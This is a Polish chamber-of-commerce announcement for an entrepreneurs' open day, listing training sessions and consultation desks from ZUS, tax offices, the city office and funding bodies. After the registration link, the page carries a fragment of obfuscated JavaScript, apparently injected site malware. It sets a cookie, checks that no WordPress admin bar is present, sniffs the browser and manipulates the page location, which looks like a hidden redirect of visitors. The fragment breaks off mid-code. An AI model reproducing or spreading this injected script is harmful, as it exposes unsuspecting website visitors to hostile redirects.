#Dzień Przedsiębiorcy! | Północna Izba Gospodarcza w Koszalinie

Kolejne dni otwarte w Północnej Izbie Gospodarczej w Szczecinie pod hasłem #dzieńprzedsiębiorcy.

Zaczynamy szkoleniami o godzinie 9:00 oraz 11:00!

Przez cały dzień możliwość skorzystania z bezpłatnych konsultacji!

Szkolenia:

BUDOWANIE ZESPOŁU – 9.00 – 13.00

MISTRZ SPRZEDAŻY – 11.00 – 15.00

ZMIANY W PRAWIE – 10.00 – 11.30

Dyżury specjalistów:

1.Polska Fundacja Przedsiębiorczości
Temat:- Baza Usług Rozwojowych – dofinansowania do szkoleń i usług doradczych do 80%

Pożyczki JEREMIE

2.Urząd Miasta Szczecin – Wydział Urbanistyki i Administracji Budowlanej
Pani Elżbieta Głowacka – zastępca dyrektora WUiAB ds. urbanistyki (decyzje o warunkach zabudowy i zagospodarowania terenu),
Pani Mariola Frąckowiak – Mosiężny – zastępca dyrektora WUiAB ds. administracji budowlanej (pozwolenia na budowę).

3.Zakład Ubezpieczeń Społecznych
Temat:- „Ustalanie uprawnień do emerytur i rent z tytułu niezdolności do pracy oraz ich przeliczanie”- „Zapobieganie wypłacie nienależnym świadczeniom – współpraca ZUS i płatników składek w zakresie kontroli zwolnień lekarskich”.- „Elektroniczne zwolnienia lekarskie – obsługa przez płatnika składek”.

4.Centrum Inicjatyw Gospodarczych
Szkolenia
Misje Gospodarcze

5.Sekcja Sukcesji
Czym jest sukcesja? Czy naprawdę trzeba o niej myśleć już teraz?
Specjaliści wyjaśnią na czym polega sukcesja, kogo dotyczy i jakie da benefity Tobie, Twojej rodzinie i Twojej firmie!

6.Wojewódzki Urząd Pracy
Rynek pracy i zatrudnianie pracowników  z zagranicy.

7.Urząd skarbowy 

8. Dotacje Unijne
Dotacje na inwestycje oraz rozwój przedsiębiorstw

9. Izba Administracji Skarbowej
Specjaliści z zakresu VAT  z urzędu skarbowego.

Rejestracja na wydarzenia: http://izba.info/spotkania/-dzien-przedsiebiorcy-harmonogram 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m